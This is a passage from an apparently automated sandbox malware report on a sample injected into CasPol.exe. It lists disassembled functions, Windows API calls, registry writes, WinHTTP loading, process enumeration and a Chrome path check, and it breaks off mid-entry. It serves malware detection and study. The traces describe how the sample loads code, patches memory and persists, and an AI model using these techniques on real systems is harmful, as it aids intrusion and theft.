                                                                                                                                                                                                                                    • Part of subcall function 100217BA: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,100217AB,10021794), ref: 100217CD
                                                                                                                                                                                                                                    • Part of subcall function 100217BA: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,100217AB,10021794), ref: 100217E1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2099061454-0
                                                                                                                                                                                                                                  • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                                  • Instruction ID: 12ea8003082ad6d35e98aca4d0b5426a3542ad57bdfd87ce099fb582a96701cb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC012D1EA4928239AB11D6B43CC2AFB5FD8DB772E0BE00796F501C7093DDA1890693F1
                                                                                                                                                                                                                                  Function 004126D2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                                                                                                                                                  • RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                                                                                                                                                  • RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateValue
                                                                                                                                                                                                                                  • String ID: HgF$pth_unenc
                                                                                                                                                                                                                                  • API String ID: 1818849710-3662775637
                                                                                                                                                                                                                                  • Opcode ID: bc9522044d74ced2922de2a73f5941ea9c6dfc645ce176e9e010a3a61b51447b
                                                                                                                                                                                                                                  • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc9522044d74ced2922de2a73f5941ea9c6dfc645ce176e9e010a3a61b51447b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                                                                                                                                                                                                                                  Function 10002B20 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 195COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 10007310: LoadLibraryW.KERNEL32(winhttp.dll,?,10002B6F), ref: 10007316
                                                                                                                                                                                                                                    • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpOpen), ref: 10007333
                                                                                                                                                                                                                                    • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpConnect), ref: 10007340
                                                                                                                                                                                                                                    • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpOpenRequest), ref: 1000734D
                                                                                                                                                                                                                                    • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpSendRequest), ref: 1000735A
                                                                                                                                                                                                                                    • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpReceiveResponse), ref: 10007367
                                                                                                                                                                                                                                    • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpQueryDataAvailable), ref: 10007374
                                                                                                                                                                                                                                    • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpReadData), ref: 10007381
                                                                                                                                                                                                                                    • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpCloseHandle), ref: 1000738E
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 10002BF2
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$ErrorLastLibraryLoad
                                                                                                                                                                                                                                  • String ID: /json$GET$WebClient/1.0$localhost
                                                                                                                                                                                                                                  • API String ID: 856020675-4094957224
                                                                                                                                                                                                                                  • Opcode ID: 7399efbfcf4974d1b25d48a285a96dc5af21be4289c970b9d87b239830cf8846
                                                                                                                                                                                                                                  • Instruction ID: 91aef2c0181b5b02629918c2efa78feadcfe58d8f36eafdb9b4bf9d8472914fd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7399efbfcf4974d1b25d48a285a96dc5af21be4289c970b9d87b239830cf8846
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6761C470A00259ABFB11EFA4CC99FEEBBB8FF05380F20811AF505A7195DB746905CB61
                                                                                                                                                                                                                                  Function 100076D0 Relevance: 7.6, APIs: 5, Instructions: 141processCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10007722
                                                                                                                                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 10007744
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 1000774F
                                                                                                                                                                                                                                  • Process32NextW.KERNEL32(?,0000022C), ref: 1000784F
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 10007861
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1789362936-0
                                                                                                                                                                                                                                  • Opcode ID: 550c526438bf7204cbee193e80a4b25de3c59c2eb0d9c386291f43524615945c
                                                                                                                                                                                                                                  • Instruction ID: d2bc65c811ca1ef7753ae95508b0a0770518ab985600e5889df07c8cfc886717
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 550c526438bf7204cbee193e80a4b25de3c59c2eb0d9c386291f43524615945c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3751B272D04219DBEB20CF98C888BAEB7F5FB48790F218259E81DA7384DB755D45CB90
                                                                                                                                                                                                                                  Function 1002175E Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,10021794), ref: 100217EF
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 10021817
                                                                                                                                                                                                                                    • Part of subcall function 1002179D: GetModuleHandleA.KERNEL32(10021794), ref: 1002179D
                                                                                                                                                                                                                                    • Part of subcall function 1002179D: GetProcAddress.KERNEL32(00000000,100217AB), ref: 100217BB
                                                                                                                                                                                                                                    • Part of subcall function 1002179D: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,100217AB,10021794), ref: 100217CD
                                                                                                                                                                                                                                    • Part of subcall function 1002179D: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,100217AB,10021794), ref: 100217E1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2099061454-0
                                                                                                                                                                                                                                  • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                                  • Instruction ID: 4dfc22582bc64b54c20ad08069fe92d14ded4e54327acf5c4b826402577880af
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E214B2E50C2C26FEB11CBB46C817E66FE8CB772A0F654696E440CB143DDA95846D3B2
                                                                                                                                                                                                                                  Function 10007A40 Relevance: 7.6, APIs: 5, Instructions: 68fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,00000000,?,?,10001539,?,00000000,000000FF,?), ref: 10007A5B
                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,10001539,?,00000000,000000FF,?,00000000,000000FF,?,00000000), ref: 10007A6C
                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,10001539,?,00000000,000000FF), ref: 10007AB8
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,?,10001539,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF), ref: 10007AC4
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,?,10001539,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF), ref: 10007AD2
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$CloseHandle$CreateReadSize
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3664964396-0
                                                                                                                                                                                                                                  • Opcode ID: 1a0f2b50282c7bc3f47239c8ab4df11530f77ef440d7da5866bfc2edcfecd33b
                                                                                                                                                                                                                                  • Instruction ID: 1c9cee4698dd12d9c6f9fbc702e91760a2e2c8769d39cee738bd46e8f50a0180
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a0f2b50282c7bc3f47239c8ab4df11530f77ef440d7da5866bfc2edcfecd33b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A211C431B00310BBF7309F689C89F5A77ACFB867A0F200549F90A972D1D7B45A41C7A2
                                                                                                                                                                                                                                  Function 0457C7E6 Relevance: 7.6, APIs: 5, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(0457C7DD), ref: 0457C7E6
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,0457C7DD), ref: 0457C838
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0457C860
                                                                                                                                                                                                                                    • Part of subcall function 0457C803: GetProcAddress.KERNEL32(00000000,0457C7F4), ref: 0457C804
                                                                                                                                                                                                                                    • Part of subcall function 0457C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,0457C7F4,0457C7DD), ref: 0457C816
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc$ProtectVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2080333215-0
                                                                                                                                                                                                                                  • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                                  • Instruction ID: b2b732c12adc45942d30c492e9b4539ece87820a7937235096ac0123369ecb07
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C016D015452423CBB236A743C08EBA5F98BB53764B140B76E001DB193D95CF101F3F5
                                                                                                                                                                                                                                  Function 100217BA Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,100217AB), ref: 100217BB
                                                                                                                                                                                                                                  • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,100217AB,10021794), ref: 100217CD
                                                                                                                                                                                                                                  • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,100217AB,10021794), ref: 100217E1
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,10021794), ref: 100217EF
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 10021817
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2152742572-0
                                                                                                                                                                                                                                  • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                                  • Instruction ID: 73f11cf717d891ec8680d3d8ccba2c06736fe3b4cafecf77f1fc2b5b54d6cdbe
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9BF0C24EA4924239EA21C5B43C82AFB4FDCCB771A0BA00A52F500C7183DC95890A93F1
                                                                                                                                                                                                                                  Function 10006220 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 124COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(?,\Google\Chrome\Application\Chrome.exe,00000025), ref: 1000634E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExistsFilePath
                                                                                                                                                                                                                                  • String ID: (x86)$ProgramFiles$\Google\Chrome\Application\Chrome.exe
                                                                                                                                                                                                                                  • API String ID: 1174141254-1866107781
                                                                                                                                                                                                                                  • Opcode ID: d4c97370cde720a617b6f654919f9fd5f379b49c00f622e63597d2ecc3da5d5c
                                                                                                                                                                                                                                  • Instruction ID: f5c5b1796602c674d072fdb72fdb3b9a68742e2cf3b4b57e043f71f885765a41
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4c97370cde720a617b6f654919f9fd5f379b49c00f622e63597d2ecc3da5d5c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B41DF74D10204EBEB00DFA8DC44BEEB7BAFF44784F60451DF406A7294DB38AA058BA0
                                                                                                                                                                                                                                  Function 00404468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92synchronizationnetworkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • send.WS2_32(000002C8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000288,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                                                                                                                                                  • SetEvent.KERNEL32(00000288,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: EventObjectSingleWaitsend
                                                                                                                                                                                                                                  • String ID: LAL
                                                                                                                                                                                                                                  • API String ID: 3963590051-3302426157
                                                                                                                                                                                                                                  • Opcode ID: 3018c180087309ad1eb3199aa252a263549720f9ff09c772ecd713a729db881a
                                                                                                                                                                                                                                  • Instruction ID: 68c7e6670e460543dd9c105572fcb78fed3a06f13f8c8b410ea91b680b50408d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3018c180087309ad1eb3199aa252a263549720f9ff09c772ecd713a729db881a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 192143B29001196BDF04BBA5DC96DEE777CFF54358B00013EF916B21E1EA78A604D6A4
                                                                                                                                                                                                                                  Function 004127D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                                                                  • RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateValue
                                                                                                                                                                                                                                  • String ID: TUF
                                                                                                                                                                                                                                  • API String ID: 1818849710-3431404234
                                                                                                                                                                                                                                  • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                                                                                                                                                  • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                                                                                                                                                                                                  Function 00404688 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3360349984-0
                                                                                                                                                                                                                                  • Opcode ID: 97aef63822e23c71db2d4dcd8e0f1fc2e443363f68162fc9169cf47362294f8a
                                                                                                                                                                                                                                  • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97aef63822e23c71db2d4dcd8e0f1fc2e443363f68162fc9169cf47362294f8a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                                                                                                                                                                                                  Function 0457C7A7 Relevance: 6.1, APIs: 4, Instructions: 100libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,0457C7DD), ref: 0457C838
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0457C860
                                                                                                                                                                                                                                    • Part of subcall function 0457C7E6: GetModuleHandleA.KERNEL32(0457C7DD), ref: 0457C7E6
